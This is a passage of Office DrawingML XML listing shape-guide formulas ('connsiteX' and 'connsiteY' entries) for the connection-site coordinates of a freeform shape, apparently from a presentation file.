              <a:gd name="connsiteY525" fmla="*/ 3812233 h 26946982"/>
              <a:gd name="connsiteX526" fmla="*/ 23952866 w 23952872"/>
              <a:gd name="connsiteY526" fmla="*/ 3932246 h 26946982"/>
              <a:gd name="connsiteX527" fmla="*/ 20020621 w 23952872"/>
              <a:gd name="connsiteY527" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX528" fmla="*/ 19399573 w 23952872"/>
              <a:gd name="connsiteY528" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX529" fmla="*/ 23952866 w 23952872"/>
              <a:gd name="connsiteY529" fmla="*/ 4553295 h 26946982"/>
              <a:gd name="connsiteX530" fmla="*/ 23952868 w 23952872"/>
              <a:gd name="connsiteY530" fmla="*/ 4673314 h 26946982"/>
              <a:gd name="connsiteX531" fmla="*/ 19279557 w 23952872"/>
              <a:gd name="connsiteY531" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX532" fmla="*/ 18658491 w 23952872"/>
              <a:gd name="connsiteY532" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX533" fmla="*/ 23952869 w 23952872"/>
              <a:gd name="connsiteY533" fmla="*/ 5294380 h 26946982"/>
              <a:gd name="connsiteX534" fmla="*/ 23952868 w 23952872"/>
              <a:gd name="connsiteY534" fmla="*/ 5414401 h 26946982"/>
              <a:gd name="connsiteX535" fmla="*/ 18538469 w 23952872"/>
              <a:gd name="connsiteY535" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX536" fmla="*/ 17797415 w 23952872"/>
              <a:gd name="connsiteY536" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX537" fmla="*/ 17917440 w 23952872"/>
              <a:gd name="connsiteY537" fmla="*/ 4 h 26946982"/>
              <a:gd name="connsiteX538" fmla="*/ 23952869 w 23952872"/>
              <a:gd name="connsiteY538" fmla="*/ 6035433 h 26946982"/>
              <a:gd name="connsiteX539" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY539" fmla="*/ 6155457 h 26946982"/>
              <a:gd name="connsiteX540" fmla="*/ 17550385 w 23952872"/>
              <a:gd name="connsiteY540" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX541" fmla="*/ 17670422 w 23952872"/>
              <a:gd name="connsiteY541" fmla="*/ 4 h 26946982"/>
              <a:gd name="connsiteX542" fmla="*/ 23952869 w 23952872"/>
              <a:gd name="connsiteY542" fmla="*/ 6282451 h 26946982"/>
              <a:gd name="connsiteX543" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY543" fmla="*/ 6402486 h 26946982"/>
              <a:gd name="connsiteX544" fmla="*/ 17303356 w 23952872"/>
              <a:gd name="connsiteY544" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX545" fmla="*/ 17423401 w 23952872"/>
              <a:gd name="connsiteY545" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX546" fmla="*/ 23952869 w 23952872"/>
              <a:gd name="connsiteY546" fmla="*/ 6529469 h 26946982"/>
              <a:gd name="connsiteX547" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY547" fmla="*/ 6649515 h 26946982"/>
              <a:gd name="connsiteX548" fmla="*/ 17056339 w 23952872"/>
              <a:gd name="connsiteY548" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX549" fmla="*/ 17176373 w 23952872"/>
              <a:gd name="connsiteY549" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX550" fmla="*/ 23952866 w 23952872"/>
              <a:gd name="connsiteY550" fmla="*/ 6776495 h 26946982"/>
              <a:gd name="connsiteX551" fmla="*/ 23952867 w 23952872"/>
              <a:gd name="connsiteY551" fmla="*/ 6896530 h 26946982"/>
              <a:gd name="connsiteX552" fmla="*/ 16562297 w 23952872"/>
              <a:gd name="connsiteY552" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX553" fmla="*/ 16682320 w 23952872"/>
              <a:gd name="connsiteY553" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX554" fmla="*/ 23952869 w 23952872"/>
              <a:gd name="connsiteY554" fmla="*/ 7270551 h 26946982"/>
              <a:gd name="connsiteX555" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY555" fmla="*/ 7390574 h 26946982"/>
              <a:gd name="connsiteX556" fmla="*/ 16315263 w 23952872"/>
              <a:gd name="connsiteY556" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX557" fmla="*/ 16435302 w 23952872"/>
              <a:gd name="connsiteY557" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX558" fmla="*/ 23952869 w 23952872"/>
              <a:gd name="connsiteY558" fmla="*/ 7517569 h 26946982"/>
              <a:gd name="connsiteX559" fmla="*/ 23952867 w 23952872"/>
              <a:gd name="connsiteY559" fmla="*/ 7637606 h 26946982"/>
              <a:gd name="connsiteX560" fmla="*/ 16068233 w 23952872"/>
              <a:gd name="connsiteY560" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX561" fmla="*/ 16188267 w 23952872"/>
              <a:gd name="connsiteY561" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX562" fmla="*/ 23952869 w 23952872"/>
              <a:gd name="connsiteY562" fmla="*/ 7764603 h 26946982"/>
              <a:gd name="connsiteX563" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY563" fmla="*/ 7884638 h 26946982"/>
              <a:gd name="connsiteX564" fmla="*/ 15821221 w 23952872"/>
              <a:gd name="connsiteY564" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX565" fmla="*/ 15941238 w 23952872"/>
              <a:gd name="connsiteY565" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX566" fmla="*/ 23952869 w 23952872"/>
              <a:gd name="connsiteY566" fmla="*/ 8011633 h 26946982"/>
              <a:gd name="connsiteX567" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY567" fmla="*/ 8131650 h 26946982"/>
              <a:gd name="connsiteX568" fmla="*/ 15574192 w 23952872"/>
              <a:gd name="connsiteY568" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX569" fmla="*/ 15694220 w 23952872"/>
              <a:gd name="connsiteY569" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX570" fmla="*/ 23952869 w 23952872"/>
              <a:gd name="connsiteY570" fmla="*/ 8258651 h 26946982"/>
              <a:gd name="connsiteX571" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY571" fmla="*/ 8378679 h 26946982"/>
              <a:gd name="connsiteX572" fmla="*/ 15327180 w 23952872"/>
              <a:gd name="connsiteY572" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX573" fmla="*/ 15447207 w 23952872"/>
              <a:gd name="connsiteY573" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX574" fmla="*/ 23952867 w 23952872"/>
              <a:gd name="connsiteY574" fmla="*/ 8505661 h 26946982"/>
              <a:gd name="connsiteX575" fmla="*/ 23952867 w 23952872"/>
              <a:gd name="connsiteY575" fmla="*/ 8625689 h 26946982"/>
              <a:gd name="connsiteX576" fmla="*/ 15080145 w 23952872"/>
              <a:gd name="connsiteY576" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX577" fmla="*/ 15200170 w 23952872"/>
              <a:gd name="connsiteY577" fmla="*/ 4 h 26946982"/>
              <a:gd name="connsiteX578" fmla="*/ 23952867 w 23952872"/>
              <a:gd name="connsiteY578" fmla="*/ 8752702 h 26946982"/>
              <a:gd name="connsiteX579" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY579" fmla="*/ 8872721 h 26946982"/>
              <a:gd name="connsiteX580" fmla="*/ 14833116 w 23952872"/>
              <a:gd name="connsiteY580" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX581" fmla="*/ 14953149 w 23952872"/>
              <a:gd name="connsiteY581" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX582" fmla="*/ 23952867 w 23952872"/>
              <a:gd name="connsiteY582" fmla="*/ 8999720 h 26946982"/>
              <a:gd name="connsiteX583" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY583" fmla="*/ 9119756 h 26946982"/>
              <a:gd name="connsiteX584" fmla="*/ 14586104 w 23952872"/>
              <a:gd name="connsiteY584" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX585" fmla="*/ 14706120 w 23952872"/>
              <a:gd name="connsiteY585" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX586" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY586" fmla="*/ 9246752 h 26946982"/>
              <a:gd name="connsiteX587" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY587" fmla="*/ 9366768 h 26946982"/>
              <a:gd name="connsiteX588" fmla="*/ 14339086 w 23952872"/>
              <a:gd name="connsiteY588" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX589" fmla="*/ 14459130 w 23952872"/>
              <a:gd name="connsiteY589" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX590" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY590" fmla="*/ 9493742 h 26946982"/>
              <a:gd name="connsiteX591" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY591" fmla="*/ 9613786 h 26946982"/>
              <a:gd name="connsiteX592" fmla="*/ 14212090 w 23952872"/>
              <a:gd name="connsiteY592" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX593" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY593" fmla="*/ 9740782 h 26946982"/>
              <a:gd name="connsiteX594" fmla="*/ 23952867 w 23952872"/>
              <a:gd name="connsiteY594" fmla="*/ 9860812 h 26946982"/>
              <a:gd name="connsiteX595" fmla="*/ 14092059 w 23952872"/>
              <a:gd name="connsiteY595" fmla="*/ 4 h 26946982"/>
              <a:gd name="connsiteX596" fmla="*/ 13845039 w 23952872"/>
              <a:gd name="connsiteY596" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX597" fmla="*/ 13965055 w 23952872"/>
              <a:gd name="connsiteY597" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX598" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY598" fmla="*/ 9987817 h 26946982"/>
              <a:gd name="connsiteX599" fmla="*/ 23952867 w 23952872"/>
              <a:gd name="connsiteY599" fmla="*/ 10107830 h 26946982"/>
              <a:gd name="connsiteX600" fmla="*/ 13598021 w 23952872"/>
              <a:gd name="connsiteY600" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX601" fmla="*/ 13718031 w 23952872"/>
              <a:gd name="connsiteY601" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX602" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY602" fmla="*/ 10234840 h 26946982"/>
              <a:gd name="connsiteX603" fmla="*/ 23952867 w 23952872"/>
              <a:gd name="connsiteY603" fmla="*/ 10354848 h 26946982"/>
              <a:gd name="connsiteX604" fmla="*/ 13350986 w 23952872"/>
              <a:gd name="connsiteY604" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX605" fmla="*/ 13471011 w 23952872"/>
              <a:gd name="connsiteY605" fmla="*/ 4 h 26946982"/>
              <a:gd name="connsiteX606" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY606" fmla="*/ 10481864 h 26946982"/>
              <a:gd name="connsiteX607" fmla="*/ 23952867 w 23952872"/>
              <a:gd name="connsiteY607" fmla="*/ 10601883 h 26946982"/>
              <a:gd name="connsiteX608" fmla="*/ 13103968 w 23952872"/>
              <a:gd name="connsiteY608" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX609" fmla="*/ 13224007 w 23952872"/>
              <a:gd name="connsiteY609" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX610" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY610" fmla="*/ 10728865 h 26946982"/>
              <a:gd name="connsiteX611" fmla="*/ 23952867 w 23952872"/>
              <a:gd name="connsiteY611" fmla="*/ 10848900 h 26946982"/>
              <a:gd name="connsiteX612" fmla="*/ 12856950 w 23952872"/>
              <a:gd name="connsiteY612" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX613" fmla="*/ 12976972 w 23952872"/>
              <a:gd name="connsiteY613" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX614" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY614" fmla="*/ 10975899 h 26946982"/>
              <a:gd name="connsiteX615" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY615" fmla="*/ 11095921 h 26946982"/>
              <a:gd name="connsiteX616" fmla="*/ 12609915 w 23952872"/>
              <a:gd name="connsiteY616" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX617" fmla="*/ 12729954 w 23952872"/>
              <a:gd name="connsiteY617" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX618" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY618" fmla="*/ 11222918 h 26946982"/>
              <a:gd name="connsiteX619" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY619" fmla="*/ 11342956 h 26946982"/>
              <a:gd name="connsiteX620" fmla="*/ 12482919 w 23952872"/>
              <a:gd name="connsiteY620" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX621" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY621" fmla="*/ 11469952 h 26946982"/>
              <a:gd name="connsiteX622" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY622" fmla="*/ 11589974 h 26946982"/>
              <a:gd name="connsiteX623" fmla="*/ 12362900 w 23952872"/>
              <a:gd name="connsiteY623" fmla="*/ 4 h 26946982"/>
              <a:gd name="connsiteX624" fmla="*/ 12115885 w 23952872"/>
              <a:gd name="connsiteY624" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX625" fmla="*/ 12235893 w 23952872"/>
              <a:gd name="connsiteY625" fmla="*/ 4 h 26946982"/>
              <a:gd name="connsiteX626" fmla="*/ 23952867 w 23952872"/>
              <a:gd name="connsiteY626" fmla="*/ 11716979 h 26946982"/>
              <a:gd name="connsiteX627" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY627" fmla="*/ 11836986 h 26946982"/>
              <a:gd name="connsiteX628" fmla="*/ 11868856 w 23952872"/>
              <a:gd name="connsiteY628" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX629" fmla="*/ 11988883 w 23952872"/>
              <a:gd name="connsiteY629" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX630" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY630" fmla="*/ 11963988 h 26946982"/>
              <a:gd name="connsiteX631" fmla="*/ 23952867 w 23952872"/>
              <a:gd name="connsiteY631" fmla="*/ 12084013 h 26946982"/>
              <a:gd name="connsiteX632" fmla="*/ 11621821 w 23952872"/>
              <a:gd name="connsiteY632" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX633" fmla="*/ 11741860 w 23952872"/>
              <a:gd name="connsiteY633" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX634" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY634" fmla="*/ 12211012 h 26946982"/>
              <a:gd name="connsiteX635" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY635" fmla="*/ 12331050 h 26946982"/>
              <a:gd name="connsiteX636" fmla="*/ 11374809 w 23952872"/>
              <a:gd name="connsiteY636" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX637" fmla="*/ 11494836 w 23952872"/>
              <a:gd name="connsiteY637" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX638" fmla="*/ 23952867 w 23952872"/>
              <a:gd name="connsiteY638" fmla="*/ 12458032 h 26946982"/>
              <a:gd name="connsiteX639" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY639" fmla="*/ 12578062 h 26946982"/>
              <a:gd name="connsiteX640" fmla="*/ 11127791 w 23952872"/>
              <a:gd name="connsiteY640" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX641" fmla="*/ 11247812 w 23952872"/>
              <a:gd name="connsiteY641" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX642" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY642" fmla="*/ 12705058 h 26946982"/>
              <a:gd name="connsiteX643" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY643" fmla="*/ 12825080 h 26946982"/>
              <a:gd name="connsiteX644" fmla="*/ 10880767 w 23952872"/>
              <a:gd name="connsiteY644" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX645" fmla="*/ 11000806 w 23952872"/>
              <a:gd name="connsiteY645" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX646" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY646" fmla="*/ 12952065 h 26946982"/>
              <a:gd name="connsiteX647" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY647" fmla="*/ 13072098 h 26946982"/>
              <a:gd name="connsiteX648" fmla="*/ 10633849 w 23952872"/>
              <a:gd name="connsiteY648" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX649" fmla="*/ 10753760 w 23952872"/>
              <a:gd name="connsiteY649" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX650" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY650" fmla="*/ 13199111 h 26946982"/>
              <a:gd name="connsiteX651" fmla="*/ 23952867 w 23952872"/>
              <a:gd name="connsiteY651" fmla="*/ 13319020 h 26946982"/>
              <a:gd name="connsiteX652" fmla="*/ 10386814 w 23952872"/>
              <a:gd name="connsiteY652" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX653" fmla="*/ 10506853 w 23952872"/>
              <a:gd name="connsiteY653" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX654" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY654" fmla="*/ 13446013 h 26946982"/>
              <a:gd name="connsiteX655" fmla="*/ 23952867 w 23952872"/>
              <a:gd name="connsiteY655" fmla="*/ 13566054 h 26946982"/>
              <a:gd name="connsiteX656" fmla="*/ 10139796 w 23952872"/>
              <a:gd name="connsiteY656" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX657" fmla="*/ 10259827 w 23952872"/>
              <a:gd name="connsiteY657" fmla="*/ 4 h 26946982"/>
              <a:gd name="connsiteX658" fmla="*/ 23952868 w 23952872"/>
              <a:gd name="connsiteY658" fmla="*/ 13693044 h 26946982"/>
              <a:gd name="connsiteX659" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY659" fmla="*/ 13813075 h 26946982"/>
              <a:gd name="connsiteX660" fmla="*/ 9892756 w 23952872"/>
              <a:gd name="connsiteY660" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX661" fmla="*/ 10012795 w 23952872"/>
              <a:gd name="connsiteY661" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX662" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY662" fmla="*/ 13940076 h 26946982"/>
              <a:gd name="connsiteX663" fmla="*/ 23952868 w 23952872"/>
              <a:gd name="connsiteY663" fmla="*/ 14060112 h 26946982"/>
              <a:gd name="connsiteX664" fmla="*/ 9645743 w 23952872"/>
              <a:gd name="connsiteY664" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX665" fmla="*/ 9765783 w 23952872"/>
              <a:gd name="connsiteY665" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX666" fmla="*/ 23952868 w 23952872"/>
              <a:gd name="connsiteY666" fmla="*/ 14187086 h 26946982"/>
              <a:gd name="connsiteX667" fmla="*/ 23952867 w 23952872"/>
              <a:gd name="connsiteY667" fmla="*/ 14307125 h 26946982"/>
              <a:gd name="connsiteX668" fmla="*/ 9518742 w 23952872"/>
              <a:gd name="connsiteY668" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX669" fmla="*/ 23952868 w 23952872"/>
              <a:gd name="connsiteY669" fmla="*/ 14434132 h 26946982"/>
              <a:gd name="connsiteX670" fmla="*/ 23952867 w 23952872"/>
              <a:gd name="connsiteY670" fmla="*/ 14554143 h 26946982"/>
              <a:gd name="connsiteX671" fmla="*/ 9398728 w 23952872"/>
              <a:gd name="connsiteY671" fmla="*/ 4 h 26946982"/>
              <a:gd name="connsiteX672" fmla="*/ 9151713 w 23952872"/>
              <a:gd name="connsiteY672" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX673" fmla="*/ 9271725 w 23952872"/>
              <a:gd name="connsiteY673" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX674" fmla="*/ 23952868 w 23952872"/>
              <a:gd name="connsiteY674" fmla="*/ 14681144 h 26946982"/>
              <a:gd name="connsiteX675" fmla="*/ 23952867 w 23952872"/>
              <a:gd name="connsiteY675" fmla="*/ 14801155 h 26946982"/>
              <a:gd name="connsiteX676" fmla="*/ 9024712 w 23952872"/>
              <a:gd name="connsiteY676" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX677" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY677" fmla="*/ 14928159 h 26946982"/>
              <a:gd name="connsiteX678" fmla="*/ 23952868 w 23952872"/>
              <a:gd name="connsiteY678" fmla="*/ 15048200 h 26946982"/>
              <a:gd name="connsiteX679" fmla="*/ 8904671 w 23952872"/>
              <a:gd name="connsiteY679" fmla="*/ 4 h 26946982"/>
              <a:gd name="connsiteX680" fmla="*/ 8657655 w 23952872"/>
              <a:gd name="connsiteY680" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX681" fmla="*/ 8777672 w 23952872"/>
              <a:gd name="connsiteY681" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX682" fmla="*/ 23952868 w 23952872"/>
              <a:gd name="connsiteY682" fmla="*/ 15175197 h 26946982"/>
              <a:gd name="connsiteX683" fmla="*/ 23952867 w 23952872"/>
              <a:gd name="connsiteY683" fmla="*/ 15295213 h 26946982"/>
              <a:gd name="connsiteX684" fmla="*/ 8410643 w 23952872"/>
              <a:gd name="connsiteY684" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX685" fmla="*/ 8530654 w 23952872"/>
              <a:gd name="connsiteY685" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX686" fmla="*/ 23952868 w 23952872"/>
              <a:gd name="connsiteY686" fmla="*/ 15422215 h 26946982"/>
              <a:gd name="connsiteX687" fmla="*/ 23952867 w 23952872"/>
              <a:gd name="connsiteY687" fmla="*/ 15542226 h 26946982"/>
              <a:gd name="connsiteX688" fmla="*/ 8163602 w 23952872"/>
              <a:gd name="connsiteY688" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX689" fmla="*/ 8283639 w 23952872"/>
              <a:gd name="connsiteY689" fmla="*/ 4 h 26946982"/>
              <a:gd name="connsiteX690" fmla="*/ 23952868 w 23952872"/>
              <a:gd name="connsiteY690" fmla="*/ 15669232 h 26946982"/>
              <a:gd name="connsiteX691" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY691" fmla="*/ 15789269 h 26946982"/>
              <a:gd name="connsiteX692" fmla="*/ 7916590 w 23952872"/>
              <a:gd name="connsiteY692" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX693" fmla="*/ 8036596 w 23952872"/>
              <a:gd name="connsiteY693" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX694" fmla="*/ 23952868 w 23952872"/>
              <a:gd name="connsiteY694" fmla="*/ 15916273 h 26946982"/>
              <a:gd name="connsiteX695" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY695" fmla="*/ 16036275 h 26946982"/>
              <a:gd name="connsiteX696" fmla="*/ 7422526 w 23952872"/>
              <a:gd name="connsiteY696" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX697" fmla="*/ 7542554 w 23952872"/>
              <a:gd name="connsiteY697" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX698" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY698" fmla="*/ 16410317 h 26946982"/>
              <a:gd name="connsiteX699" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY699" fmla="*/ 16530345 h 26946982"/>
              <a:gd name="connsiteX700" fmla="*/ 7175508 w 23952872"/>
              <a:gd name="connsiteY700" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX701" fmla="*/ 7295525 w 23952872"/>
              <a:gd name="connsiteY701" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX702" fmla="*/ 23952868 w 23952872"/>
              <a:gd name="connsiteY702" fmla="*/ 16657344 h 26946982"/>
              <a:gd name="connsiteX703" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY703" fmla="*/ 16777363 h 26946982"/>
              <a:gd name="connsiteX704" fmla="*/ 7789583 w 23952872"/>
              <a:gd name="connsiteY704" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX705" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY705" fmla="*/ 16163288 h 26946982"/>
              <a:gd name="connsiteX706" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY706" fmla="*/ 16283322 h 26946982"/>
              <a:gd name="connsiteX707" fmla="*/ 7669550 w 23952872"/>
              <a:gd name="connsiteY707" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX708" fmla="*/ 7048513 w 23952872"/>
              <a:gd name="connsiteY708" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX709" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY709" fmla="*/ 16904359 h 26946982"/>
              <a:gd name="connsiteX710" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY710" fmla="*/ 17024381 h 26946982"/>
              <a:gd name="connsiteX711" fmla="*/ 6928490 w 23952872"/>
              <a:gd name="connsiteY711" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX712" fmla="*/ 6801500 w 23952872"/>
              <a:gd name="connsiteY712" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX713" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY713" fmla="*/ 17151371 h 26946982"/>
              <a:gd name="connsiteX714" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY714" fmla="*/ 17271410 h 26946982"/>
              <a:gd name="connsiteX715" fmla="*/ 6681461 w 23952872"/>
              <a:gd name="connsiteY715" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX716" fmla="*/ 6554460 w 23952872"/>
              <a:gd name="connsiteY716" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX717" fmla="*/ 23952868 w 23952872"/>
              <a:gd name="connsiteY717" fmla="*/ 17398408 h 26946982"/>
              <a:gd name="connsiteX718" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY718" fmla="*/ 17518428 h 26946982"/>
              <a:gd name="connsiteX719" fmla="*/ 6434443 w 23952872"/>
              <a:gd name="connsiteY719" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX720" fmla="*/ 6307442 w 23952872"/>
              <a:gd name="connsiteY720" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX721" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY721" fmla="*/ 17645423 h 26946982"/>
              <a:gd name="connsiteX722" fmla="*/ 23952867 w 23952872"/>
              <a:gd name="connsiteY722" fmla="*/ 17765460 h 26946982"/>
              <a:gd name="connsiteX723" fmla="*/ 6187408 w 23952872"/>
              <a:gd name="connsiteY723" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX724" fmla="*/ 6060407 w 23952872"/>
              <a:gd name="connsiteY724" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX725" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY725" fmla="*/ 17892464 h 26946982"/>
              <a:gd name="connsiteX726" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY726" fmla="*/ 18012480 h 26946982"/>
              <a:gd name="connsiteX727" fmla="*/ 5940390 w 23952872"/>
              <a:gd name="connsiteY727" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX728" fmla="*/ 5813384 w 23952872"/>
              <a:gd name="connsiteY728" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX729" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY729" fmla="*/ 18139487 h 26946982"/>
              <a:gd name="connsiteX730" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY730" fmla="*/ 18259515 h 26946982"/>
              <a:gd name="connsiteX731" fmla="*/ 5693356 w 23952872"/>
              <a:gd name="connsiteY731" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX732" fmla="*/ 5566366 w 23952872"/>
              <a:gd name="connsiteY732" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX733" fmla="*/ 23952868 w 23952872"/>
              <a:gd name="connsiteY733" fmla="*/ 18386502 h 26946982"/>
              <a:gd name="connsiteX734" fmla="*/ 23952867 w 23952872"/>
              <a:gd name="connsiteY734" fmla="*/ 18506524 h 26946982"/>
              <a:gd name="connsiteX735" fmla="*/ 5446343 w 23952872"/>
              <a:gd name="connsiteY735" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX736" fmla="*/ 5319353 w 23952872"/>
